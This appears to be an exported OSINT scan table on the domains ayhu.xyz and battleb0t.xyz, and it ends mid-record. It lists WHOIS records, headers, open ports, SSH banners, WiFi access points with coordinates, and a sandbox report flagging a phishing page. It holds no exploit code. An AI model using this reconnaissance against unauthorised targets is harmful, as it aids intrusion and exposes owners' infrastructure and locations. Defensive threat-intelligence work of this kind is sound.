| 2023-05-12 03:32:52 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 3 | 0 | None | referrer-policy: same-origin | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=fiT%2Fr8CwWrAQPZkt8VpkeQoVoGOR6HuHPRasaTPIcW93tfGJar9pTikOfGdSWQA5SZHUpCyuk56gghqLlY9yU5dVDbV5Bs9yRYYuQ0D9hZe3tyWEFUstq9XRCg%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 03:24:21 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f8c594cb34339-EWR", "cross-origin-opener-policy": "same-origin"} |
| 2023-05-12 02:44:49 | Company Name | No | Company Name Extractor | 4 | 0 | 2 | 0 | None | GoDaddy.com, LLC | Domain Name: AYHU.XYZ
Registry Domain ID: D338262912-CNIC
Registrar WHOIS Server: whois.godaddy.com
Registrar URL: https://www.godaddy.com/
Updated Date: 2023-01-27T12:12:18.0Z
Creation Date: 2022-12-13T18:01:25.0Z
Registry Expiry Date: 2023-12-13T23:59:59.0Z
Registrar: Go Daddy, LLC
Registrar IANA ID: 146
Domain Status: clientRenewProhibited https://icann.org/epp#clientRenewProhibited
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
Registrant Organization: Domains By Proxy, LLC
Registrant State/Province: Arizona
Registrant Country: US
Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Name Server: BRETT.NS.CLOUDFLARE.COM
Name Server: LEANNA.NS.CLOUDFLARE.COM
DNSSEC: unsigned
Billing Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Registrar Abuse Contact Email: abuse@godaddy.com
Registrar Abuse Contact Phone: +1.4805058800
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of WHOIS database: 2023-05-12T02:44:06.0Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
>>> IMPORTANT INFORMATION ABOUT THE DEPLOYMENT OF RDAP: please visit
https://www.centralnic.com/support/rdap <<<
The Whois and RDAP services are provided by CentralNic, and contain
information pertaining to Internet domain names registered by our
our customers. By using this service you are agreeing (1) not to use any
information presented here for any purpose other than determining
ownership of domain names, (2) not to store or reproduce this data in
any way, (3) not to use any high-volume, automated, electronic processes
to obtain data from this service. Abuse of this service is monitored and
actions in contravention of these terms will result in being permanently
blacklisted. All data is (c) CentralNic Ltd (https://www.centralnic.com)
Access to the Whois and RDAP services is rate limited. For more
information, visit https://registrar-console.centralnic.com/pub/whois_guidance.
Domain Name: ayhu.xyz
Registry Domain ID: D338262912-CNIC
Registrar WHOIS Server: whois.godaddy.com
Registrar URL: https://www.godaddy.com
Updated Date: 2022-12-13T18:01:26Z
Creation Date: 2022-12-13T18:01:25Z
Registrar Registration Expiration Date: 2023-12-13T23:59:59Z
Registrar: GoDaddy.com, LLC
Registrar IANA ID: 146
Registrar Abuse Contact Email: abuse@godaddy.com
Registrar Abuse Contact Phone: +1.4806242505
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
Domain Status: clientRenewProhibited https://icann.org/epp#clientRenewProhibited
Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
Registry Registrant ID: CR599348184
Registrant Name: Registration Private
Registrant Organization: Domains By Proxy, LLC
Registrant Street: DomainsByProxy.com
Registrant Street: 2155 E Warner Rd
Registrant City: Tempe
Registrant State/Province: Arizona
Registrant Postal Code: 85284
Registrant Country: US
Registrant Phone: +1.4806242599
Registrant Phone Ext:
Registrant Fax: +1.4806242598
Registrant Fax Ext:
Registrant Email: Select Contact Domain Holder link at https://www.godaddy.com/whois/results.aspx?domain=ayhu.xyz
Registry Admin ID: CR599348186
Admin Name: Registration Private
Admin Organization: Domains By Proxy, LLC
Admin Street: DomainsByProxy.com
Admin Street: 2155 E Warner Rd
Admin City: Tempe
Admin State/Province: Arizona
Admin Postal Code: 85284
Admin Country: US
Admin Phone: +1.4806242599
Admin Phone Ext:
Admin Fax: +1.4806242598
Admin Fax Ext:
Admin Email: Select Contact Domain Holder link at https://www.godaddy.com/whois/results.aspx?domain=ayhu.xyz
Registry Tech ID: CR599348185
Tech Name: Registration Private
Tech Organization: Domains By Proxy, LLC
Tech Street: DomainsByProxy.com
Tech Street: 2155 E Warner Rd
Tech City: Tempe
Tech State/Province: Arizona
Tech Postal Code: 85284
Tech Country: US
Tech Phone: +1.4806242599
Tech Phone Ext:
Tech Fax: +1.4806242598
Tech Fax Ext:
Tech Email: Select Contact Domain Holder link at https://www.godaddy.com/whois/results.aspx?domain=ayhu.xyz
Name Server: BRETT.NS.CLOUDFLARE.COM
Name Server: LEANNA.NS.CLOUDFLARE.COM
DNSSEC: unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023-05-12T02:44:06Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
TERMS OF USE: The data contained in this registrar's Whois database, while believed by the
registrar to be reliable, is provided "as is" with no guarantee or warranties regarding its
accuracy. This information is provided for the sole purpose of assisting you in obtaining
information about domain name registration records. Any use of this data for any other purpose
is expressly forbidden without the prior written permission of this registrar. By submitting
an inquiry, you agree to these terms and limitations of warranty. In particular, you agree not
to use this data to allow, enable, or otherwise support the dissemination or collection of this
data, in part or in its entirety, for any purpose, such as transmission by e-mail, telephone,
postal mail, facsimile or other means of mass unsolicited, commercial advertising or solicitations
of any kind, including spam. You further agree not to use this data to enable high volume, automated
or robotic electronic processes designed to collect or compile this data for any purpose, including
mining this data for your own personal or commercial purposes. Failure to comply with these terms
may result in termination of access to the Whois database. These terms may be subject to modification
at any time without notice.
|
| 2023-05-12 03:00:39 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.41): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 02:54:38 | Netblock Membership | No | Censys | 0 | 0 | 3 | 0 | None | 172.67.160.0/20 | 172.67.168.252 |
| 2023-05-12 03:18:57 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | SurfandSip (Net ID: 00:02:2D:03:87:91) | 37.780462,-122.390564 |
| 2023-05-12 02:55:26 | Social Media Presence | No | Social Network Identifier | 0 | 0 | 5 | 0 | None | Github: https://github.com/login/oauth/authorize?client_id=42db428b279076117521&redirect_uri=https://qolhub.cloudflareaccess.com/cdn-cgi/access/callback&response_type=code&scope=user:email,read:org&state=9995ee075e82e86ee47e714d846227dc35b4772134e51bd1627e17e1594cf0fa.JTdCJTIyaWF0JTIyJTNBMTY4Mzg2MDA2MiUyQyUyMmF1dGhEb21haW4lMjIlM0ElMjJxb2xodWIuY2xvdWRmbGFyZWFjY2Vzcy5jb20lMjIlMkMlMjJob3N0bmFtZSUyMiUzQSUyMnBhbmVsLmJhdHRsZWIwdC54eXolMjIlMkMlMjJyZWRpcmVjdFVSTCUyMiUzQSUyMiUyRiUyMiUyQyUyMmF1ZCUyMiUzQSUyMjBlOGZjZDVjNGQ2ZjJmYmI2YmMxOGMxNjQ4MTJmMTQ2ZjY2ZTgzZDc3MmMyNjI2MmFhY2E4NjBkZmE3Y2I1YzMlMjIlMkMlMjJpc1NhbWVTaXRlTm9uZUNvbXBhdGlibGUlMjIlM0F0cnVlJTJDJTIyaXNJRFBUZXN0JTIyJTNBZmFsc2UlMkMlMjJpc1JlZnJlc2glMjIlM0FmYWxzZSUyQyUyMm5vbmNlJTIyJTNBJTIybnJqNDNmeHBOVUJsSTJVdGQlMjIlMkMlMjJpZHBJZCUyMiUzQSUyMjc2MDcwNmM0LTZhMGItNDFlZC05ZjJhLTI5NGFkZjQ1NjBkYSUyMiUyQyUyMnNlcnZpY2VfdG9rZW5faWQlMjIlM0ElMjIlMjIlMkMlMjJzZXJ2aWNlX3Rva2VuX3N0YXR1cyUyMiUzQWZhbHNlJTJDJTIyYXV0aF9zdGF0dXMlMjIlM0ElMjJOT05FJTIyJTJDJTIyaXNfd2FycCUyMiUzQWZhbHNlJTJDJTIyaXNfZ2F0ZXdheSUyMiUzQWZhbHNlJTJDJTIybXRsc19hdXRoJTIyJTNBJTdCJTIyY2VydF9pc3N1ZXJfc2tpJTIyJTNBJTIyJTIyJTJDJTIyY2VydF9wcmVzZW50ZWQlMjIlM0FmYWxzZSUyQyUyMmNlcnRfc2VyaWFsJTIyJTNBJTIyJTIyJTJDJTIyY2VydF9pc3N1ZXJfZG4lMjIlM0ElMjIlMjIlMkMlMjJhdXRoX3N0YXR1cyUyMiUzQSUyMk5PTkUlMjIlN0QlMkMlMjJhcHBTZXNzaW9uSGFzaCUyMiUzQSUyMjRmN2M5OTlmNGM0OTk1OTE5NTUyZGRkYWUzMWYwMzEwZjI2OTc4ZWZlZGE1M2FmMmQ4MThmNWVlZTRlY2EyOTMlMjIlN0Q%3D | https://github.com/login/oauth/authorize?client_id=42db428b279076117521&redirect_uri=https://qolhub.cloudflareaccess.com/cdn-cgi/access/callback&response_type=code&scope=user:email,read:org&state=9995ee075e82e86ee47e714d846227dc35b4772134e51bd1627e17e1594cf0fa.JTdCJTIyaWF0JTIyJTNBMTY4Mzg2MDA2MiUyQyUyMmF1dGhEb21haW4lMjIlM0ElMjJxb2xodWIuY2xvdWRmbGFyZWFjY2Vzcy5jb20lMjIlMkMlMjJob3N0bmFtZSUyMiUzQSUyMnBhbmVsLmJhdHRsZWIwdC54eXolMjIlMkMlMjJyZWRpcmVjdFVSTCUyMiUzQSUyMiUyRiUyMiUyQyUyMmF1ZCUyMiUzQSUyMjBlOGZjZDVjNGQ2ZjJmYmI2YmMxOGMxNjQ4MTJmMTQ2ZjY2ZTgzZDc3MmMyNjI2MmFhY2E4NjBkZmE3Y2I1YzMlMjIlMkMlMjJpc1NhbWVTaXRlTm9uZUNvbXBhdGlibGUlMjIlM0F0cnVlJTJDJTIyaXNJRFBUZXN0JTIyJTNBZmFsc2UlMkMlMjJpc1JlZnJlc2glMjIlM0FmYWxzZSUyQyUyMm5vbmNlJTIyJTNBJTIybnJqNDNmeHBOVUJsSTJVdGQlMjIlMkMlMjJpZHBJZCUyMiUzQSUyMjc2MDcwNmM0LTZhMGItNDFlZC05ZjJhLTI5NGFkZjQ1NjBkYSUyMiUyQyUyMnNlcnZpY2VfdG9rZW5faWQlMjIlM0ElMjIlMjIlMkMlMjJzZXJ2aWNlX3Rva2VuX3N0YXR1cyUyMiUzQWZhbHNlJTJDJTIyYXV0aF9zdGF0dXMlMjIlM0ElMjJOT05FJTIyJTJDJTIyaXNfd2FycCUyMiUzQWZhbHNlJTJDJTIyaXNfZ2F0ZXdheSUyMiUzQWZhbHNlJTJDJTIybXRsc19hdXRoJTIyJTNBJTdCJTIyY2VydF9pc3N1ZXJfc2tpJTIyJTNBJTIyJTIyJTJDJTIyY2VydF9wcmVzZW50ZWQlMjIlM0FmYWxzZSUyQyUyMmNlcnRfc2VyaWFsJTIyJTNBJTIyJTIyJTJDJTIyY2VydF9pc3N1ZXJfZG4lMjIlM0ElMjIlMjIlMkMlMjJhdXRoX3N0YXR1cyUyMiUzQSUyMk5PTkUlMjIlN0QlMkMlMjJhcHBTZXNzaW9uSGFzaCUyMiUzQSUyMjRmN2M5OTlmNGM0OTk1OTE5NTUyZGRkYWUzMWYwMzEwZjI2OTc4ZWZlZGE1M2FmMmQ4MThmNWVlZTRlY2EyOTMlMjIlN0Q%3D |
| 2023-05-12 03:42:18 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | GortzenWIFI (Net ID: 00:11:50:36:95:E1) | 50.8897, 6.0563 |
| 2023-05-12 03:32:27 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.97.14:80 | 188.114.97.0/24 |
| 2023-05-12 03:00:57 | Co-Hosted Site | No | HackerTarget | 2 | 0 | 2 | 0 | None | 01-edu.github.io | 185.199.111.153 |
| 2023-05-12 02:54:16 | Linked URL - Internal | No | Web Spider | 1 | 0 | 3 | 0 | None | https://oldfluid.battleb0t.xyz/logo.png | https://oldfluid.battleb0t.xyz/ |
| 2023-05-12 03:18:06 | URL (Purely Static) | No | Page Information | 0 | 0 | 3 | 0 | None | http://nwapi2.battleb0t.xyz | <!DOCTYPE html>
<html>
<head>
<meta charset="utf-8" />
<meta name="viewport" content="width=device-width, initial-scale=1.0" />
<link rel="iron" href="https://cdn.discordapp.com/avatars/710143953533403226/02ca825e4901e74c2c2d6f8e59341325.png?size=512" sizes="512x512" type="image/png" />
<meta property="og:title" content="SkyHelper API - Documentation" />
<meta property="og:image" content="https://cdn.discordapp.com/avatars/710143953533403226/02ca825e4901e74c2c2d6f8e59341325.png?size=512" />
<meta property="oh.theme-color" content="#3585d0" />
<meta property="og:description" content="A hypixel skyblock API wrapper containing most features that the SkyHelper bot has to offer." />
<title>SkyHelper API - Documentation</title>
<link rel="stylesheet" href="https://stackedit.io/style.css" />
</head>
<body class="stackedit">
<div class="stackedit__html">
<h1 id="skyhelper-api">SkyHelper API</h1>
<h1 id="authentication">Authentication</h1>
<p>
The SkyHelper API uses their own API keys to authenticate requests. You can either host this API on your own server and define keys on there or subscribe to the SkyHelper
<a href="https://www.patreon.com/skyhelper">Patreon</a> (Silver or Gold Supporter) to get an API key from me.<br />
You can either use the key query parameter by adding a
<code>?key=token</code> to the end of API requests or using an authorization header by adding a <code>Authorization</code> header to your API requests, where the value of the header is your API
token.
</p>
<h1 id="responses">Responses</h1>
<p>
All endpoints in the API return all their responses in JSON, all requests will return a <code>status</code> key which should match the response status code that was returned and a
<code>data</code> key for successful responses. A <code>reason</code> key will be returned for failed requests.
</p>
<table>
<thead>
<tr>
<th>Status Code</th>
<th>Reason</th>
</tr>
</thead>
<tbody>
<tr>
<td>200</td>
<td>Successful request</td>
</tr>
<tr>
<td>400</td>
<td>
The request is missing an authentication method (valid
<code>key</code> query parameter or an <code>Authentication</code> header)
</td>
</tr>
<tr>
<td>403</td>
<td>The provided token does not exist</td>
</tr>
<tr>
<td>404</td>
<td>There is no player with the given UUID or name or the player has no SkyBlock profiles</td>
</tr>
<tr>
<td>429</td>
<td>
The Hypixel API rate-limit was reached (The API will return
<code>RateLimit-Remaining</code> and <code>RateLimit-Reset</code> headers)
</td>
</tr>
<tr>
<td>500</td>
<td>
There was an error in the SkyHelper API or the Hypixel API returned an unknown error code. Please report these errors back on
<a href="https://github.com/Altpapier/SkyHelperAPI/issues">GitHub</a>
</td>
</tr>
<tr>
<td>502</td>
<td>Hypixels API is experiencing some technical issues or is unavailable</td>
</tr>
<tr>
<td>503</td>
<td>Hypixels API is in maintenance mode</td>
</tr>
<tr>
<td>504</td>
<td>Hypixels API returned a <code>Gateway Time-out</code> error</td>
</tr>
</tbody>
</table>
<h1 id="endpoints">Endpoints</h1>
<h3 id="get-v2networth"><code>POST</code> /v2/networth</h3>
<table>
<thead>
<tr>
<th>Field</th>
<th>Type</th>
<th>Description</th>
</tr>
</thead>
<tbody>
<tr>
<td>profileData</td>
<td>Object</td>
<td>The profile player data from the Hypixel API (profile.members[uuid])</td>
</tr>
<tr>
<td>bankBalance</td>
<td>Number</td>
<td>The player's bank balance from the Hypixel API (profile.banking?.balance)</td>
</tr>
<tr>
<td>onlyNetworth</td>
<td>Boolean</td>
<td>(default: false) If true, only the networth will be returned</td>
</tr>
</tbody>
</table>
<h3 id="post-v2networthitem"><code>POST</code>/v2/networth/item</h3>
<table>
<thead>
<tr>
<th>Field</th>
<th>Type</th>
<th>Description</th>
</tr>
</thead>
<tbody>
<tr>
<td>itemData</td>
<td>Object</td>
<td>The parsed item data of an item from the profiles endpoint</td>
</tr>
</tbody>
</table>
<h3 id="get-v2profilesuser"><code>GET</code> /v2/profiles/:user</h3>
<h3 id="get-v2profileuserprofile"><code>GET</code> /v2/profile/:user/:profile</h3>
<h3 id="get-v1profilesuser"><code>GET</code> /v1/profiles/:user</h3>
<h3 id="get-v1profileuserprofile"><code>GET</code> /v1/profile/:user/:profile</h3>
<h3 id="get-v1profilesuseritems"><code>GET</code> /v1/items/:user</h3>
<h3 id="get-v1profileuserprofileitems"><code>GET</code> /v1/items/:user/:profile</h3>
<h3 id="get-v1fetchur"><code>GET</code> /v1/fetchur</h3>
<table>
<thead>
<tr>
<th>Parameter</th>
<th>Description</th>
</tr>
</thead>
<tbody>
<tr>
<td>user</td>
<td>This can be the UUID of a user or the name</td>
</tr>
<tr>
<td>profile</td>
<td>This can be the users profile id or name</td>
</tr>
</tbody>
</table>
<h1 id="networthcalculationtypes">Networth Calculation Types</h1>
<p>Types that are used to describe an item's calculation</p>
<table>
<thead>
<tr>
<th>Type</th>
</tr>
</thead>
<tbody>
<tr>
<td>essence</td>
</tr>
<tr>
<td>prestige</td>
</tr>
<tr>
<td>shens_auction</td>
</tr>
<tr>
<td>winning_bid</td>
</tr>
<tr>
<td>enchant</td>
</tr>
<tr>
<td>silex</td>
</tr>
<tr>
<td>wood_singularity</td>
</tr>
<tr>
<td>tuned_transmission</td>
</tr>
<tr>
<td>thunder_charge</td>
</tr>
<tr>
<td>rune</td>
</tr>
<tr>
<td>fuming_potato_book</td>
</tr>
<tr>
<td>hot_potato_book</td>
</tr>
<tr>
<td>dye</td>
</tr>
<tr>
<td>the_art_of_war</td>
</tr>
<tr>
<td>the_art_of_peace</td>
</tr>
<tr>
<td>farming_for_dummies</td>
</tr>
<tr>
<td>recombobulator_3000</td>
</tr>
<tr>
<td>gemstone</td>
</tr>
<tr>
<td>reforge</td>
</tr>
<tr>
<td>master_star</td>
</tr>
<tr>
<td>necron_scroll</td>
</tr>
<tr>
<td>gemstone_chamber</td>
</tr>
<tr>
<td>drill_part</td>
</tr>
<tr>
<td>etherwarp_conduit</td>
</tr>
<tr>
<td>pet_item</td>
</tr>
|
| 2023-05-12 03:03:18 | Internet Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | ayhu.xyz | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
03:18:ae:06:7e:fc:0b:78:46:5c:8b:fe:1a:31:bf:5b:16:b8
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Dec 13 17:51:43 2022 GMT
Not After : Mar 13 17:51:42 2023 GMT
Subject: CN=*.ayhu.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (2048 bit)
Modulus:
00:d2:a8:d4:9f:a9:bd:76:f3:4e:fa:75:b4:78:5e:
d8:6a:71:e4:f3:f9:c2:77:fe:f9:7d:4c:da:66:22:
e0:cd:34:b7:7c:8d:14:1c:4d:7d:46:bd:0d:78:0c:
dd:5b:c4:ff:9f:13:d1:36:82:30:3b:b9:24:f9:65:
eb:d4:82:59:47:e9:be:2d:ca:25:2b:a1:b5:27:87:
63:33:e8:be:3d:46:8c:9b:0f:9e:b7:28:4d:eb:79:
63:20:73:aa:a3:d5:3d:c6:2e:b7:9c:7f:e7:f8:96:
79:6d:51:52:62:f7:cc:65:ca:dd:5b:ef:27:c9:9c:
81:e6:4a:8c:e9:e1:99:cd:79:f8:60:4b:a5:6b:6f:
c9:a2:fa:cc:0c:e7:34:b2:77:b5:de:bd:fe:24:a9:
e6:e9:26:4a:54:ec:0f:53:69:fc:a9:cb:fb:84:2e:
7d:af:75:b6:15:ef:6d:e3:fb:23:27:72:c7:fd:a8:
77:78:c9:f6:5b:6f:b1:0a:09:7c:e3:91:c1:95:13:
b4:4a:b2:6f:b1:ab:4c:4d:0b:11:8c:fd:8d:fb:d9:
37:66:3b:07:7b:cc:19:50:a2:89:0c:ea:8d:f1:d1:
b3:36:06:ad:51:15:23:e4:0c:43:f6:cc:90:55:fa:
98:c8:81:54:f2:2f:f7:d0:0b:4f:9f:38:a8:6c:71:
67:c5
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
46:DD:F2:80:57:6C:FD:50:6F:F3:DF:3E:F6:D6:F8:E4:B9:2D:C4:6F
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:*.ayhu.xyz, DNS:ayhu.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : 7A:32:8C:54:D8:B7:2D:B6:20:EA:38:E0:52:1E:E9:84:
16:70:32:13:85:4D:3B:D2:2B:C1:3A:57:A3:52:EB:52
Timestamp : Dec 13 18:51:43.785 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:46:02:21:00:E2:3A:9E:51:10:7B:4C:32:13:F1:5A:
6A:72:5F:B6:48:D3:B8:D4:7D:48:A2:D1:1B:9F:EB:E7:
11:FF:38:46:00:02:21:00:D3:77:1A:17:F1:84:6D:6C:
D3:83:45:FF:8A:32:05:10:85:83:2B:14:0A:F5:20:00:
0A:C7:41:FB:1B:F5:B4:74
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : E8:3E:D0:DA:3E:F5:06:35:32:E7:57:28:BC:89:6B:C9:
03:D3:CB:D1:11:6B:EC:EB:69:E1:77:7D:6D:06:BD:6E
Timestamp : Dec 13 18:51:43.756 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:46:02:21:00:A6:36:07:C7:E6:2A:25:82:42:12:4D:
3F:F8:74:7A:85:A6:64:36:C2:59:78:48:20:18:36:E7:
26:72:A3:D3:2A:02:21:00:CE:BD:F6:83:26:75:28:EF:
BF:A1:B5:32:8B:FB:88:31:3E:85:D6:30:F1:F3:D4:9D:
92:CD:06:30:FD:39:59:E8
Signature Algorithm: sha256WithRSAEncryption
a9:06:04:95:e2:ce:64:b2:f3:1c:fd:0a:94:52:d2:fb:cc:c9:
bb:ab:0e:16:c4:1c:35:3d:b4:77:7c:ef:d6:ce:15:8a:5b:9e:
15:7d:14:b0:74:3a:46:24:d1:6f:34:39:94:aa:e4:7f:b3:c9:
dd:04:77:c5:ed:88:f9:56:f6:b2:da:16:f2:de:95:4d:ae:cc:
c8:8f:2c:fe:b6:1f:27:28:b2:fe:3a:41:41:5e:a9:6f:ac:34:
59:b2:f1:77:96:18:6e:7d:12:a0:7b:52:1d:2d:59:87:c8:35:
17:48:37:92:0d:56:c5:76:a2:4a:4c:44:69:ac:a7:c0:72:d3:
f1:3c:5f:67:11:8b:f4:4a:b6:30:14:01:f3:f3:67:9a:5c:2e:
68:09:32:e8:4e:f1:3c:d1:09:b1:a6:43:2f:3e:bb:09:66:13:
cc:5d:ab:f8:25:f6:78:95:33:b3:b2:17:2b:15:e6:77:00:0d:
a1:3e:62:fc:76:b4:f3:f1:09:99:3e:08:aa:64:da:d8:5e:3a:
0f:1e:07:1c:09:b4:d2:9f:70:f7:12:f8:0a:19:e8:db:b1:ab:
d6:b6:c1:9f:ab:18:be:a8:46:0e:6f:9c:06:b3:0d:0a:44:0f:
f9:65:04:25:ce:38:c1:7b:7d:87:a9:b5:0f:1d:54:1a:8b:7d:
b8:c2:59:33
|
| 2023-05-12 02:55:21 | Open TCP Port Banner | No | Censys | 0 | 1 | 3 | 0 | None | SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.1 | 207.154.228.169 |
| 2023-05-12 02:55:18 | Operating System | No | Censys | 0 | 0 | 3 | 0 | None | Ubuntu Linux | 46.101.229.70 |
| 2023-05-12 03:00:54 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.86): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:01:26 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.0): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 02:45:59 | Physical Coordinates | No | AbstractAPI | 0 | 0 | 3 | 0 | None | 41.8781, -87.6298 | 104.21.71.14 |
| 2023-05-12 02:50:53 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [u'phishing'], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 110, u'major_os_version': None, u'submit_name': u'https://thedude23.github.io/netflix-clone/', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3000"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesLockedCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_bb8_IE_EarlyTabStart_0xdb4_Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_bb8_ConnHashTable<3000>_HashTable_Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_bb8_IESQMMUTEX_0_303"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_bb8_IESQMMUTEX_0_331"\n "\\Sessions\\1\\BaseNamedObjects\\{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\InternetShortcutMutex"\n "IsoScope_bb8_IESQMMUTEX_0_331"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "IsoScope_bb8_IESQMMUTEX_0_519"\n "IsoScope_bb8_IE_EarlyTabStart_0xdb4_Mutex"\n "IsoScope_bb8_ConnHashTable<3000>_HashTable_Mutex"\n "Local\\VERMGMTBlockListFileMutex"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"185.199.108.153:443"\n "104.194.8.120:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"i.ibb.co"\n "thedude23.github.io"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'Found string ".fa-cc-paypal:before {" (Indicator: "dir "; File: "all_1_.css")\n Found string ".fa-paypal:before {" (Indicator: "dir "; File: "all_1_.css")\n Found string ".fa-twitter:before {" (Indicator: "dir "; File: "all_1_.css")\n Found string ".fa-twitter-square:before {" (Indicator: "dir "; File: "all_1_.css")\n Found string ".fa-youtube:before {" (Indicator: "dir "; File: "all_1_.css")\n 